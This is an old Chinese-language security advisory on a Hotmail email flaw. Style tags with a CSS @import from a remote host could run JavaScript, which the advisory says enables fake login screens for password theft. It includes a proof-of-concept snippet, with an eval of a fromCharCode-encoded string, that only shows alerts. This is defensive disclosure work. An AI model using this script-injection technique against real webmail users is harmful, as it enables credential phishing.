Hotmail 新的安全漏洞发布时间:2000-04-23 更新时间:2000-04-23 严重程度:中 威胁程度:欺骗 错误类型:设计错误 利用方式:客户机模式 受影响系统 WinNT详细描述 Hotmail允许在EMAIL信息中使用<STYLE>标签,"@import url(http://host/hostile.css)" 的Javascript代码,当用户查看MAIL时可能被显示一伪造的LOGIN画面并 让用户在不知道的情况下输入密码。当然也存在查看用户信息,发送信息更其他事情。 测试代码 ------------------------------------------- <STYLE type=text/css> @import url(http://www.nat.bg/~joro/test.css); </STYLE> ------------------------------------------- where http://www.nat.bg/~joro/test.css contains: ------------------------------------------- @import url(javascript:alert('JavaScript is executed')); @import url(javascript:eval(String.fromCharCode(97,108,101,114,116, 40,39,84,101,115,116,32,49,39,41,59,97,108,101,114,116,40, 39,84,101,115,116,32,50,39,41,59))); ------------------------------------------- 解决方案 浏览HOTMAIL时关闭JAVASCRIPT或则不要使用IE 相关信息 |
